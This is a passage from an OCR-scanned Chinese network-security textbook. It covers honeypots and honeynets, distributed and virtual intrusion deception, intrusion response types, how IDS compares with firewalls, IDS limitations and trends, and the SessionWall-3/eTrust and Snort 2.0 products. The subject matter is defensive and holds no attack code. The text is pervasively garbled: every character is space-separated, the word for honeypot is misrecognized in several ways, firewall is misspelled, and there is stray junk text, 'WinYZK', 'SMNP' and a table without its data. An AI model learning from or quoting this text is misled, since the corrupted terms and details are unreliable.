能 多 地 收集 攻击 情报 信息 。 针 对 入 侵 的 不 同 层次 ， 以 及 蜜 负 规 模 配 置 的 复杂 性 ， 蜜 饶 技 术 
又 可 以 分 为 单机 蜜 饮 系 统 和 蜜 钢 网 络 诱骗 系统 。 

1) “单机 蜜 饶 系 统 

使 用 一 台 计 算 机 作为 保护 目标 系统 的 副本 ， 和 真实 目标 系统 相 比 ， 安 装 同样 的 操作 系 
统 ， 提 供 同 样 的 服务 。 这 人 台 计 算 机 上 有 很 多 已 知 的 系统 漏洞 ， 同 时 还 有 诱 人 的 虚假 信息 ， 
如 公司 的 财务 报表 、 年 度 计 划 等 。 简 单 的 单机 蜜 缸 ， 即 在 一 台 主 机 上 实现 入 侵 诱 骗 ， 可 以 
用 硬件 或 者 虚拟 软件 来 实现 。 目 前 ， 国 外 存在 一 些 业 务 型 单机 蜜 钢 产 品 ， 作 为 一 种 网 络 安 
全 工具 ， 它 们 直接 保护 应 用 系统 的 安全 ， 通 常 没有 提供 操作 系统 支持 ， 而 是 虚拟 特定 应 用 
服务 ， 将 针对 服务 系统 的 攻击 转移 到 蜜 饶 中 进行 记录 、 分 析 和 预警 ， 表 现形 式 均 为 各 种 专 
用 密 负 ， 如 防范 垃圾 邮件 的 Antispam honeypot， 它 能 够 在 不 删除 合法 邮件 的 条 件 下 过 滤 垃 
圾 邮件 ， 而 Worm honeypot 专门 捕捉 各 种 自动 攻击 代码 ， 收 集 各 种 蠕虫 信息 。 

2)” 蜜 网 系统 

蜜 网 采用 一 个 实际 的 网 络 来 作为 陷阱 ， 在 各 主机 上 实现 基于 主机 级 的 入 侵 诱骗 ， 通 常 
具有 路 由 器 、 防 火 墙 、 各 种 服务 器 (WWW、FTP、DNS 等 ) 以 及 网 络 中 的 数据 传输 行为 。 
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按照 使 用 目的 不 同 ， 蜜 网 也 可 以 分 为 业务 型 蜜 网 (production honeynet) 和 研究 型 蜜 网 
(research honeynet)。 研 究 型 蜜 网 系统 一 般 应 用 于 政府 、 大 学 或 者 其 他 实力 雄厚 的 网 络 安全 
研究 机 构 。 它 没有 任何 防御 意义 ， 价 值 在 于 通过 为 入 侵 者 提供 一 个 逼真 的 网 络 诱骗 平台 来 
学 习 攻 击 行为 信息 ， 尤 其 是 未 知 攻击 行为 信息 ， 为 提高 实际 系统 的 安全 性 能 提供 参考 。 

3. 分 布 式 入 侵 诱骗 


以 蜜 铅 为 代表 的 单一 诱骗 环境 的 研究 在 入 侵 诱骗 技术 发 展 的 过 程 中 起 到 了 非常 重要 的 
作用 ， 但 随 着 入 侵 攻 击 技术 的 飞速 发 展 ， 单 一 诱骗 环境 的 局 限 性 逐渐 显露 出 来 ， 例 如 ， 对 
于 稍 高 级 的 网 络 入 侵 ， 运 行 于 单一 计算 机 上 的 蜜 钢 所 起 的 作用 就 非常 小 了 。 因 此 ， 采 用 新 
式 部 署 策略 的 分 布 式 入 侵 诱骗 便 应 运 而 生 ， 它 将 诱骗 散布 在 网 络 的 正常 系统 和 资源 中 ， 利 
用 闲置 的 服务 端口 来 充当 诱骗 ， 从 而 增 大 了 入 侵 者 遭遇 诱骗 的 可 能 性 。 分 布 式 入 侵 诱 骗 具 
有 两 个 直接 的 效果 : 一 是 将 诱骗 分 布 到 更 广 范 围 的 他 地 址 和 端口 空间 中 ; 二 是 增 大 了 诱骗 
在 整个 网 络 中 的 百分比 ， 使 得 诱骗 被 入 侵 者 扫描 器 发 现 的 可 能 性 增 大 ， 从 而 相对 降低 了 受 
保护 系统 的 安全 弱点 被 入 侵 者 发 现 的 可 能 性 。 尽 管 如 此 ， 分 布 式 入 侵 诱骗 仍 有 其 局 限 性 ， 
主要 表现 在 资源 消耗 大 ， 维 护 困难 。 

4. 虚拟 入 侵 诱骗 

从 入 侵 诱 骗 技 术 产生 时 起 ， 虚 拟 的 思想 就 一 直 伴随 着 整个 研究 的 发 展 ， 分 布 式 入 侵 诱 
骗 产 生 后 , 物理 分 布 式 主机 的 资源 消耗 大 、 维护 困难 等 问题 一 直 困 拓 着 研究 的 进一步 发 展 
于 是 ， 虚 拟 诱骗 技术 作为 解决 这 一 问题 的 一 个 重要 切入 点 受到 越 来 越 多 的 关注 。 从 早期 的 
单一 入 侵 诱 骗 环境 研究 开始 ， 入 侵 诱 骗 环 境 就 可 以 被 划分 成 物理 的 和 虚拟 的 两 大 类 。 物 理 
诱骗 环境 就 是 那些 在 网 络 上 具有 真实 IP 地 址 的 一 台 真 实 主机 , 虚拟 诱骗 环境 则 是 那些 通过 
其 他 计算 机 模拟 ， 对 发 送 到 虚拟 诱骗 环境 的 网 络 传输 进行 响应 的 虚拟 主机 。 

目前 最 具有 代表 性 的 虚拟 诱骗 环境 实现 方式 是 虚拟 机 软件 方式 。 现 在 一 般 有 两 种 虚拟 
软件 可 以 选择 : VMware 和 Virtual PC。 这 两 个 软件 各 有 特色 ， 相 对 而 言 ，VMware 更 合适 
于 构建 虚拟 蜜 网 。 它 是 一 种 允许 在 一 台 计 算 机 上 安装 其 他 虚拟 机 的 软件 。 一 个 安装 了 
Windows 系统 的 计算 机 , 利用 VMware 软件 , 就 不 仅 能 在 这 台 计 算 机 上 运行 Windows 系统 ， 
还 能 在 该 Windows 系统 上 运行 Linux， 即 在 一 台 计 算 机 上 同时 运行 两 个 不 同 的 操作 系统 。 

虚拟 入 侵 诱骗 的 优点 就 在 于 其 所 需 消耗 的 系统 资源 相 比 物理 入 侵 诱骗 通常 要 少 得 多 ， 
且 能 够 极 大 地 降低 诱骗 环境 的 维护 难度 。 


6.2.5 ”入侵 响应 技术 


当 IDS 分 析出 入 侵 行 为 或 可 疑 现象 后 ， 系 统 需 要 采取 相应 手段 ， 及 时 做 出 反应 ， 将 入 
侵 造 成 的 损失 降 到 最 低 程度 。 一 般 可 以 通过 生成 事件 报警 、 电 子 邮件 或 短信 息 来 通知 管理 
员 。 随 着 网 络 的 日 益 复 杂 和 安全 要 求 的 提高 ， 更 加 实时 的 和 自动 的 入 侵 响应 方法 正 逐 渐 被 
研究 和 应 用 。 

1. 入 侵 响 应 的 重要 性 

在 过 去 的 入 侵 检 测 系统 的 研究 和 设计 中 ， 研 究 者 往往 把 焦点 集中 在 设计 一 个 更 有 效 的 
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系统 和 发 展 新 的 检测 技术 上 ， 对 入 侵 响 应 的 研究 很 不 充分 ， 入 侵 响 应 系统 远 远 没有 跟 上 攻 
击 技术 发 展 的 步伐 。 目 前 商业 化 的 IDS 所 提供 的 响应 功能 十 分 有 限 ， 大 部 分 还 都 只 是 一 些 
简单 的 警报 信息 。 因 此 ， 人 迫切 需要 研究 入 侵 响应 技术 ， 开 发 具有 完善 功能 的 入 侵 检测 系统 。 


2. 入 侵 响应 系统 的 分 类 


入 侵 响应 指 当 检测 到 入 侵 或 攻击 时 采取 适当 的 措施 阻止 入 侵 和 攻击 的 进行 。 入 侵 响 应 
系统 (Intrusion Response System，IRS) 指 实施 入 侵 响 应 的 系统 。 入 侵 响 应 系统 按 响应 类 型 可 
以 分 为 通知 和 警报 响应 系统 、 人 工 手 动 响应 系统 和 自动 响应 系统 。 

表 6-1 总 结 了 这 三 种 响应 系统 在 现 有 入 侵 检测 系统 中 所 使 用 的 比例 。 


表 6-1 入 侵 响 应 系统 分 类 


入 侵 响应 系统 分 类 
通知 和 警报 (Notification) 


人 工 手 动 响应 (Manual response) 
自动 响应 (Automatic response) 


1) “通知 和 警报 响应 系统 

由 表 6-1 可 以 看 出 ， 大 部 分 的 入 侵 检测 和 响应 系统 属于 通知 和 警报 类 型 。 这 些 系统 仅 
仅 为 系统 管理 员 定 期 产生 警报 和 报告 ， 时 间 间 隔 可 以 是 每 分 钟 到 每 小 时 或 者 每 天 。 系 统管 
理 员 然 后 根据 系统 产生 的 报告 对 可 能 的 入 侵 行为 作 进 一 步调 查 。 

2) “人工 手 动 响应 系统 

- 些 系统 允许 系统 管理 员 根 据 一 组 预先 设 定好 的 响应 措施 对 入 侵 行 为 人 工 进 行 响应 。 
这 类 系统 往往 为 用 户 提供 多 种 正确 的 响应 措施 选择 ， 同 时 也 允许 系统 管理 员 根 据 提 供 的 响 
应 措施 作 最 后 的 决定 。 这 一 性 能 使 系统 管理 员 可 以 更 快 地 响应 入 侵 行 为 ， 而 且 为 经 验 不 足 
的 系统 管理 员 提供 帮助 。 

3) ”自动 响应 系统 

自动 响应 系统 结构 如 图 6-10 所 示 。 

响应 决策 模块 根据 输入 的 安全 事件 做 出 决策 ， 然 后 从 决策 知识 库 里 面 提取 出 相应 的 响 
应 决策 ， 并 把 响应 决策 反馈 给 响应 执行 模块 。 响 应 执行 模块 根据 输入 的 响应 决策 从 响应 工 
具 库 调用 具体 的 响应 方式 并 发 布 响应 执行 动作 。 这 样 ， 自 动 响应 系统 就 可 以 通过 预先 设 定 
的 响应 措施 对 入 侵 行为 即时 地 做 出 响应 ， 从 而 减少 或 者 消除 攻击 者 利用 存在 的 时 间 问 隙 进 
行 攻击 的 机 会 。 

3. 入 侵 响应 方式 


从 响应 的 方式 上 分 ， 入 侵 响 应 可 以 简单 地 分 为 被 动 响 应 和 主动 响应 两 大 类 型 。 

1) ”主动 响应 方式 

主动 响应 是 基于 一 个 检测 到 的 入 侵 行为 所 采取 的 主动 措施 ， 其 可 以 选择 的 措施 可 分 为 
以 下 几 种 类 型 。 


6-10 自动 响应 系统 结构 图 


(1) 针对 入 侵 行为 采取 必要 措施 : 即 追踪 入 侵 者 实施 攻击 的 源 ， 并 采取 相应 措施 如 禁 
用 入 侵 者 的 计算 机 或 者 网 络 连接 等 。 

(2) 重新 修正 配置 系统 : 修正 系统 以 弥补 引起 攻击 的 缺陷 ， 相 比 其 他 的 响应 方式 ， 这 
种 方式 更 加 缓和 ， 而 且 往往 是 最 佳 的 一 种 选择 。 

(3) 设计 网 络 陷阱 以 收集 更 为 详尽 的 信息 : 通常 通过 设置 专门 的 诱骗 系统 来 实现 ， 最 
常见 的 是 “ 密 铅 ”。 

2) ”被 动 响应 方式 

被 动 响应 是 只 为 用 户 提供 警报 信息 , 由 用 户 自 己 决定 接 下 来 采取 何 种 措施 的 响应 方式 。 
在 早期 的 入 侵 检测 系统 中 ， 所 有 的 响应 系统 都 属于 被 动 响应 。 被 动 响应 很 重要 ， 在 很 多 情 
况 下 甚至 作为 唯一 的 响应 形式 而 存在 。 其 采取 的 措施 主要 分 为 以 下 两 种 。 

(1) 警报 和 通知 : 警报 的 响应 方式 有 多 种 ， 用 户 可 以 自己 定制 适合 自己 系统 运行 过 程 
的 警报 。 最 常见 的 警报 和 通知 是 显示 在 屏幕 上 的 警告 信息 或 者 窗口 ， 一 般 出 现在 入 侵 检测 
系统 的 控制 台 上 ， 也 可 以 出 现在 用 户 安装 入 侵 检测 系统 时 所 定义 的 部 件 上 ， 还 可 以 通过 电 
子 邮件 或 者 移动 电话 等 给 系统 管理 员 和 安全 人 员 发 送 警 报 和 和 警告 信息 。 

(2) SMNP 陷阱 和 插件 : 入 侵 检 测 系统 可 以 设计 成 和 网 络 管理 工具 一 起 协同 运作 ， 这 
样 可 以 更 好 地 利用 网 络 管理 的 基础 设备 , 在 网 络 管理 控制 台 上 发 送 和 显示 警报 信息 。 目 前 ， 
一 些 商业 产品 利用 简单 的 网 络 管理 协议 (SMNP) 的 消息 和 陷阱 作为 一 种 警报 的 方式 。 


6.3 ”入 侵 检测 分 析 
入 侵 检测 技术 是 一 种 当今 非常 重要 的 动态 安全 技术 ， 如 果 与 传统 的 静态 安全 技术 共同 


使 用 ， 可 以 大 大 提高 系统 的 安全 防护 水 平 。 
本 节 将 介绍 入 侵 检测 的 特点 、 缺 点 及 其 和 防火 墙 的 比较 。 
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6.3.1 入 侵 检 测 特 点 分 析 


入 侵 检测 系统 的 特点 如 下 。 

。 ”在 人 很 少 干 预 的 情况 下 ， 能 连续 运行 。 

。 当 系 统 由 于 事故 或 恶意 攻击 而 崩溃 时 ， 具 有 容错 能 力 。 当 系统 重新 启动 时 ， 入 侵 
检测 系统 能 自动 恢复 自己 的 状态 。 

必须 能 抗 攻击 。 入 侵 检测 系统 必须 能 监测 自己 的 运行 ， 检 测 自 身 是 否 被 修改 。 
运行 时 ， 尽 可 能 少 地 占用 系统 资源 ， 以 免 干扰 系统 的 正常 运行 。 

对 被 监控 系统 的 安全 策略 ， 可 以 进行 配置 。 

必须 能 适应 系统 和 用 户 行为 的 变化 。 如 增加 新 的 应 用 ， 或 改变 用 户 应 用 。 

当 要 实时 监控 大 量 主机 时 ， 系 统 应 能 进行 扩展 。 

入 侵 检测 系统 一 些 部 件 因为 某 些 原因 停止 工作 时 , 应 尽量 减少 对 其 他 部 分 的 影响 。 
系统 应 能 允许 动态 配置 。 当 系统 管理 员 修改 配置 时 ， 不 需要 重新 启动 系统 。 


6.3.2 ”入 侵 检测 与 防火 墙 
1. 防火 墙 的 局 限 


众多 的 企业 、 组 织 与 政府 部 门 都 在 组 建 和 发 展 自己 的 网 络 ,为 了 保证 网 络 资源 的 安全 
企业 一 般 采用 防火 堵 作 为 安全 保障 体系 的 第 一 道 防线 ， 通 过 访问 控制 ， 防 御 黑 客 攻击 ， 提 
供 静 态 防护 。 

但 是 随 着 越 来 越 多 的 系统 本 身 漏洞 以 及 应 用 系统 的 漏洞 被 发 现 ， 以 及 攻击 者 的 入 侵 广 
式 更 加 隐 珊 ， 新 的 攻击 方式 层出不穷 ， 单 纯 地 依靠 防火 墙 已 经 无 法 完全 防御 不 断 变 化 的 入 
侵 攻击 的 发 生 。 

传统 的 防火 墙 主要 有 以 下 的 不 足 。 

。 防火墙 作 为 访问 控制 设备 ， 无 法 检测 或 拦截 嵌入 到 普通 流量 中 的 恶意 攻击 代码 ， 

比如 针对 Web 服务 的 注入 攻击 等 。 

。 ”防火 堵 无 法 发 现 内 部 网 络 中 的 攻击 行为 。 

由 于 防火 墙 具有 以 上 一 些 缺 陷 ， 所 以 部 署 了 防火 载 的 安全 保障 体系 还 有 进一步 完善 的 
需要 。 

2， 入侵 检测 系统 与 防火 墙 的 关系 


入 侵 检 测 系 统 (Intrusion Detection System) 是 对 防火 墙 有 益 的 补充 , 入 侵 检测 系统 被 认为 
是 防火 墙 之 后 的 第 二 道 安全 闸门 ， 对 网 络 进行 检测 ， 提 供 对 内 部 攻击 、 外 部 攻击 和 误 操作 
的 实时 监控 ， 提 供 动态 保护 ， 大 大 提高 了 网 络 的 安全 性 。 
入 侵 检测 工作 的 主要 特点 有 以 下 几 个 方面 。 
。 ”事前 警告， 入 侵 检 测 系统 能 够 在 入 侵 攻 击 对 网 络 系统 造成 危害 前 ， 及 时 检测 到 入 
侵 攻击 的 发 生 ， 并 进行 报警 。 
。 事 中 防护 : 入 侵 攻击 发 生 时 , 入 侵 检测 系统 可 以 通过 与 防火 墙 联 动 、TCP Killer 等 
方式 进行 报警 及 动态 防护 。 


TTT EF 


。 ”事后 取证 : 被 入 侵 攻 击 后 ， 入 侵 检测 系统 可 以 提供 详细 的 攻击 信息 ， 便 于 取证 
分 析 。 

综 上 记述 ， 防 火 墙 提供 静态 防护 ， 而 入 侵 检测 系统 提供 动态 防护 ， 因 此 防火 墙 和 入 侵 
检测 系统 的 结合 ， 能 够 给 网 络 带 来 全 面 的 防护 。 对 防火 墙 和 入 侵 检测 系统 的 关系 有 一 个 经 
典 的 比喻 : 防火 墙 相当 于 门卫 ， 对 于 所 有 进出 大 门 的 人 员 进行 检 查 ， 入 侵 检测 系统 相当 于 
闭路 监控 系统 ， 监 控 关 键 位 置 如 财务 、 库 房 等 地 的 安全 状况 ， 仅 有 门卫 是 无 法 发 现 内 部 人 
员 的 非法 行为 ， 而 闭路 监控 系统 可 以 实时 监控 ， 发 现 异 常情 况 及 时 报警 。 两 者 的 配合 使 用 
才能 保证 安全 。 


6.3.3 ”入 侵 检测 系统 的 缺陷 
1. 当前 入 侵 检测 系统 存在 的 问题 和 面临 的 挑战 


入 侵 检测 技术 虽然 经 历 了 二 十 余年 的 发 展 ， 但 是 仍 不 成 熟 。 当 前 的 入 侵 检 测 产品 通常 
采用 了 较为 简单 的 特征 检测 方法 ( 误 用 检测 )， 异 常 检测 只 能 作为 辅助 手段 。 所 以 ， 虽 然 当 
前 的 入 侵 检 测 产 品 能 够 发 现 已 知 的 绝 大 部 分 攻击 , 但 是 它们 仍然 存在 以 下 两 个 严重 的 问题 。 

1) “对 未 知 攻击 的 识别 能 力 差 

这 是 特征 检测 方法 固有 的 缺陷 ， 只 有 加 强 异 常 检测 方法 的 研究 ， 用 异常 检测 方法 代 痊 
特征 检测 方法 才能 解决 这 一 难题 。 

2) ” 误 警 率 高 

误 警 包括 两 种 情况 : 一 是 漏 报 ， 即 不 能 发 现存 在 的 入 侵 ; 另 一 个 是 误 报 ， 即 将 正常 行 
为 判 为 入 侵 。 这 直接 影响 到 入 侵 检测 系统 的 自动 反应 能 力 ， 以 极 不 准确 的 判断 为 基础 的 自 
动 响应 是 不 可 思议 的 。 

而 随 着 社会 的 发 展 和 技术 的 进步 ， 入 侵 检 测 技术 将 面临 以 下 挑战 。 

。 黑客 能 力 的 提高 ， 目 的 的 多 样 化 。 

加 密 技术 日 益 广泛 的 应 用 。 

网 络 流量 的 增加 。 

缺乏 广 为 接 受 的 相关 标准 。 

缺乏 客观 的 入 侵 检测 系统 评价 和 测试 信息 。 
针对 入 侵 检 测 系统 自身 的 攻击 。 

许多 系统 设计 时 没有 充分 考虑 安全 问题 。 


2. 入 侵 检测 系统 的 发 展 趋势 


随 着 信息 系统 对 一 个 国家 的 社会 生产 与 国民 经 济 的 影响 越 来 越 重要 ， 信 息 战 已 逐步 被 
各 个 国家 所 重视 。 信 息 战 中 的 主要 攻击 “武器 ”就 是 网 络 的 入 侵 技术 ， 信 息 战 的 防御 主要 
包括 “保护 ”、“ 检 测 ” 与 “响应 ”， 入 侵 检测 则 是 其 中 “检测 ”与 “响应 ”环节 不 可 缺 
少 的 部 分 。 

相对 传统 的 针对 信息 系统 的 破坏 手段 ， 网 络 入 侵 具 有 以 下 特点 : 没有 地 域 和 时 间 的 限 
制 ， 通过 网 络 的 攻击 往往 混杂 在 大 量 正 常 的 网 络 活动 之 间 ， 隐 蔽 性 强 ;， 入侵 手 段 更 加 隐蔽 
和 复杂 。 由 于 网 络 入 侵 具 有 上 述 特点 ， 如 何 通过 计算 机 对 其 进行 实时 入 侵 检测 ， 就 成 为 目 
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前 众多 网 络 安全 手段 中 的 核心 技术 。 

目前 ， 入 侵 检 测 技 术 的 发 展 趋势 有 如 下 几 个 方面 。 

1) “分 布 式 入 侵 检测 

这 个 概念 有 两 层 含义 : 第 一 层 ， 针 对 分 布 式 网 络 攻击 的 检测 方法 ， 第 二 层 使 用 分 布 式 
的 方法 来 检测 分 布 式 的 攻击 ， 其 中 的 关键 技术 为 检测 信息 的 协同 处 理 与 入 侵 攻 击 的 全 局 信 
息 的 提取 。 

分 布 式 系统 是 现代 IDS 主要 发 展 方向 之 一 ， 它 能 够 在 数据 收集 、 入 侵 分 析 和 自动 响应 
方面 最 大 限度 地 发 挥 系 统 资源 的 优势 ， 其 设计 模型 具有 很 大 的 灵活 性 。 

2) ”智能 化 入 侵 检 测 

使 用 智能 化 的 方法 与 手段 来 进行 入 侵 检 测 。 所 谓 的 智能 化 方法 ， 现 阶段 常用 的 有 神经 
网 络 、 遗 传 算法 、 模 糊 技术 、 免 疫 原 理 等 方法 ， 这 些 方法 常用 于 入 侵 特征 的 辨识 与 泛 化 。 
利用 专家 系统 的 思想 来 构建 IDS 也 是 常用 的 方法 之 一 。 

3) “网络 安全 技术 相 结合 

结合 防火 墙 、PKIX、 安 全 电子 交易 (SET) 等 新 的 网 络 安全 与 电子 商务 技术 ， 提 供 完整 
的 网 络 安全 保障 。 例 如 ， 基 于 网 络 和 基于 主机 的 入 侵 检测 系统 相 结合 ， 将 把 现在 的 基于 网 
络 和 基于 主机 这 两 种 检测 技术 很 好 地 集成 起 来 ， 相 互补 充 ， 提 供 集成 化 的 攻击 签名 、 检 测 、 
报告 和 事件 关联 等 功能 。 这 是 入 侵 检测 技术 目前 的 发 展 方向 。 


6.4 常用 入 侵 检测 产品 介绍 


6.4.1 CA Session Wall 


Computer Associates 公司 的 SessionWall-3， 现 在 常 称 为 eTrust Intrusion Detection 是 业 
界 领 先 的 功能 非常 强大 的 基于 网 络 的 入 侵 检 测 系 统 。SessionWall-3/eTrust Intrusion 
Detection 可 以 通过 降低 对 网 络 管理 技能 和 时 间 的 要 求 ， 在 确保 网 络 的 连接 性 能 的 前 提 下 ， 
大 大 提高 网 络 的 安全 性 。SessionWall-3/eTrust Intrusion Detection 可 以 完全 自动 地 识别 网 络 
使 用 模式 以 及 特殊 网 络 应 用 ， 并 能 够 识别 各 种 基于 网 络 的 入 侵 、 攻 击 和 滥用 活动 。 另 外 ， 
SessionWall-3/eTrust Intrusion Detection 还 可 以 将 网 络 上 发 生 的 各 种 有 关 生 产 应 用 、 网 络 安 
全 和 公司 策略 方面 的 众多 疑点 提取 出 来 。 

SessionWall-3/eTrust Intrusion Detection 具有 强大 的 入 侵 检测 和 保护 功能 ， 包 括 限 制 
Web 访问 、 监 控 / 阻 塞 /报警 、 入 侵 探 测 、 攻 击 探测 、 恶 意 applets、 亚 意 E-mail 等 在 内 的 安 
全 保护 措施 。 


1. 入 侵 检测 功能 


SessionWall-3/eTrust Intrusion Detection 最 主要 的 功能 是 入 侵 检 测 ， 它 包括 入 侵 探测 和 
服务 拒绝 型 攻击 探测 引擎 ， 可 以 自动 识别 各 种 入 侵 模式 ， 在 对 网 络 数据 进行 分 析 时 与 这 些 
模式 进行 匹配 ， 一 旦 发 现 某 些 入 侵 的 企图 ， 就 会 进行 报警 。Intrusion Detection 可 以 在 企业 
网 络 范围 内 广泛 地 收集 信息 并 根据 预定 的 规则 对 其 进行 有 针对 性 的 记录 ， 管 理 员 可 以 在 此 
记录 的 基础 上 ,通过 浏览 器 对 相关 记录 进行 过 滤 、 排 序 和 查看 等 操作 ， 并 创建 详细 的 报告 。 


2. 会 话 记 录 、 拦 截 功能 

SessionWall-3/eTrust Intrusion Detection 还 可 以 对 所 有 的 TCP/UDP 会 话 进行 记录 或 拦 
截 。 对 于 Telnet 会 话 ，eTrust Intrusion Detection 提供 了 “回放 ”功能 ， 用 户 只 要 通过 鼠标 
简单 地 选择 回放 ， 该 Telnet 过 程 就 会 重 现 出 来 。 同 样 ， 对 于 Web 会 话 ，eTrust Intrusion 
Detection 会 在 右边 同步 地 显示 浏览 器 看 到 的 内 容 ， 同 步 监 视 客户 的 活动 。 管 理 员 点 击 某 链 
接 ， 也 可 以 直接 得 到 该 页 内 容 ， 相 当 于 一 个 浏览 器 。 

对 于 其 他 的 任意 应 用 ,只 要 我 们 指明 其 TCP/UDP 端口 , 也 可 以 非常 简单 地 进行 监视 记 
录 ， 如 E-mail、News、FTP、POP3 甚至 NetBIOS 等 。eTrust Intrusion Detection 还 提供 了 字 
符 匹 配 的 过 滤 功 能 ， 管 理 员 可 以 定义 相应 的 敏感 字符 串 ， 在 规则 实施 后 对 网 络 中 流 经 的 数 
据 包 进 行 检查 和 拦截 ， 防 止 涉及 机 密 内 容 的 数据 未 经 认证 就 通过 E-mail、Web 等 方式 被 发 
送出 去 ， 该 功能 是 通过 CA 的 专利 技术 unobtrusive blocking 实现 的 。 
3. 防止 网 络 滥用 


网 络 滥用 往往 表现 为 对 不 恰当 的 Web 站 点 进行 访问 , 使 用 内 部 网 络 从 事 与 其 他 员工 或 
网 络 用 户 的 非 正当 通信 或 不 正当 的 网 络 资源 消耗 。 

SessionWall-3/eTrust Intrusion Detection 也 包含 一 个 巨大 的 超过 400000 个 分 类 站 点 清单 
的 URL 控制 列表 ， 本 身 相 当 于 Web 控制 网 关 类 软件 。 它 通过 unobtrusive blocking 技术 禁 
止 或 限制 内 部 用 户 访问 某 些 Web 站 点 ， 以 防止 网 络 的 小 用 。 同 时， 由 于 eTrust Intrusion 
Detection 是 以 被 动 的 方式 连接 到 网 络 上 的 ， 对 流量 进行 简单 地 监听 ， 一 旦 发 现 需要 拦截 的 
访问 ， 即 加 以 阻止 ， 因 此 不 会 造成 任何 延迟 或 性 能 问题 。 

4. 活动 代码 和 病毒 防护 


SessionWall-3/eTrust Intrusion Detection 还 包含 攻击 型 Java/ActiveX 探测 引擎 和 病毒 探 
测 引擎 ， 在 计算 机 病毒 或 攻击 型 Java/ActiveX 模块 通过 网 络 传播 时 ，eTrust Intrusion 
Detection 可 以 发 现 它 们 ， 并 进行 报警 或 其 他 自动 处 理 。eTrust Intrusion Detection 包含 计算 
机 病毒 代码 和 攻击 型 Java/ActiveX 模式 库 ， 该 库 可 以 通过 CA 的 站 点 定时 自动 更 新 ， 以 保 
证 对 最 新 的 病毒 和 攻击 模式 进行 防护 。 

5. 与 其 他 安全 产品 集成 与 配合 


SessionWall-3/eTrust Intrusion Detection 既 可 以 独立 使 用 ， 又 可 以 与 其 他 相关 安全 产品 
配合 使 用 ， 如 防火 墙 、 策 略 扫描 、 安 全 审计 及 Cisco OS 等 。 它 对 所 有 流行 的 防火 墙 (包括 
eTrust Firewall、Check Point Firewall-1 等 ) 是 有 效 的 补充 ， 可 以 提供 与 应 用 相关 的 保护 ， 提 
供 入 侵 探测 ， 并 对 现 有 的 设置 进行 审计 。 它 在 检测 到 某 种 入 侵 企图 之 后 ， 可 以 自动 配置 相 
关 防 火 墙 , 切断 该 入 侵 来 源 , 或 是 发 送 指令 至 Cisco 路 由 器 以 阻 断 数据 流 ， 从 而 防止 该 “ 黑 
客 ” 进 行 其 他 的 入 侵 。 在 eTrust Intrusion Detection 中 还 提供 了 eTrust Policy Compliance 的 
代理 程序 ， 为 策略 扫描 提供 安全 记录 信息 。 其 相应 的 日 志 记 录 也 可 以 被 发 送 到 安全 审计 产 
品 eTrust Audit 中 进行 统一 的 查看 。 
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6. 集中 管理 


SessionWall-3/eTrust Intrusion Detection 既 可 以 单机 使 用 ， 即 对 网 络 流量 的 截取 、 分 析 、 
报警 、 拦 截 、 配 置 和 统计 等 在 一 台 计 算 机 上 完成 ， 也 支持 集中 化 管理 和 监控 。 在 eTrust 
Intrusion Detection 中 提供 了 专门 的 工具 eTrust Intrusion Detection Central 来 实现 企业 级 网 络 
入 侵 检测 的 统一 部 署 。 管 理 员 可 以 在 集中 的 控制 台 上 进行 相关 规则 的 设 定 与 统一 分 发 ， 从 
而 对 远程 的 Client 端 进行 有 效 地 控制 。 

SessionWall-3/eTrust Intrusion Detection 还 包括 用 于 Web 访问 的 策略 集 ( 用 于 监视 /阻塞 / 
报警 ) 和 用 于 入 侵 监 测 的 策略 集 (用 于 攻击 监测 、 恶 意 小 程序 和 恶意 电子 邮件 )。 这 些 策略 集 
包含 了 SessionWall-3/eTrust Intrusion Detection 对 所 有 通信 进行 扫描 的 策略 ， 这 些 策略 不 仅 
指定 了 扫描 的 模式 、 通 信 协 议 、 寻 址 方式 、 网 络 域 、URL 以 及 扫描 内 容 ， 还 指定 了 相应 的 
处 理 动作 。 一 旦 安装 了 SessionWall-3/eTrust Intrusion Detection， 它 将 立即 投入 对 入 侵 企图 
和 可 疑 网 络 活动 的 监视 ， 并 对 所 有 电子 邮件 、Web 浏览 、 新 闻 、Telnet 和 FTP 活动 进行 

SessionWall-3/eTrust Intrusion Detection 与 大 多 数 网 络 保护 产品 不 同 ， 后 者 是 生硬 地 安 
插 在 网 络 通信 路 径 中 的 ， 而 前 者 则 是 完全 透明 的 ， 它 不 需要 对 网 络 和 地 址 做 任何 的 变化 ， 
也 不 会 给 独立 于 平台 的 网 络 带 来 任何 的 传输 延迟 。 

SessionWall-3/eTrust Intrusion Detection 代表 了 最 新 一 代 Internet 和 Intranet 网 络 保护 产 
品 ， 它 具备 前 所 未 有 的 访问 控制 水 平 、 用 户 的 透明 度 、 性 能 、 灵 活性 、 适 应 性 和 易 用 性 。 
另外 ，SessionWall-3/eTrust Intrusion Detection 还 包括 一 个 会 话 视窗 ， 可 以 用 于 网 络 入 侵 的 
监视 、 审 计 ， 并 可 以 为 电子 通信 的 滥用 现象 提供 充分 的 证 据 。 

SessionWall-3/eTrust Intrusion Detection 可 以 满足 各 种 网 络 保护 需求 ， 它 的 主要 应 用 对 
象 包括 审计 人 员 、 安 全 咨询 人 员 、 执 法 监督 机 构 、 金 融 机 构 、 中 小 型 商务 机 构 、 大 型 企业 、 
ISP、 教 育 机 构 和 政府 机 构 等 。 


6.4.2 Snort 


Snort 是 一 个 强大 的 轻 量 级 的 网 络 入侵 检 测 系统 。 它 具有 实时 数据 流量 分 析 和 日 志 人 P 
网 络 数据 包 的 能 力 ， 能 够 进行 协议 分 析 ， 对 内 容 进 行 搜索 /匹配 。 它 能 够 检测 各 种 不 同 的 攻 
击 方式 ， 对 攻击 进行 实时 报警 。Snort 基于 GPL( 通 用 公共 许可 证 )， 它 是 一 个 出 色 的 免费 
NIDS 系统 , 作者 是 Marty Roesch， 本 节 探 讨 的 是 Snort 2.0 版 本 。 参见 http://www.snort.org。 


1. Snort 2.0 的 基本 特点 


Snort 2.0 具有 以 下 特点 。 

。 Snort 2.0 是 一 个 轻 量 级 的 入 侵 检测 系统 。 

。 Snort 2.0 的 代码 极为 简洁 、 短 小 ， 其 源 代码 压缩 包 只 有 大 约 110KB。 

。 Snort 2.0 的 可 移植 性 很 好 , Snort 的 跨 平台 性 能 极 佳 , 目前 已 经 支持 Linux、Solaris、 
BSD、IRIX、HP-UX、WinYZK 等 系统 。 

。 ”Snort 2.0 的 功能 非常 强大 ， 具 有 实时 流量 分 析 和 日 志 他 网 络 数据 包 的 能 力 ， 能够 
快速 地 检测 网 络 攻击 ， 及 时 地 发 出 报警 。 
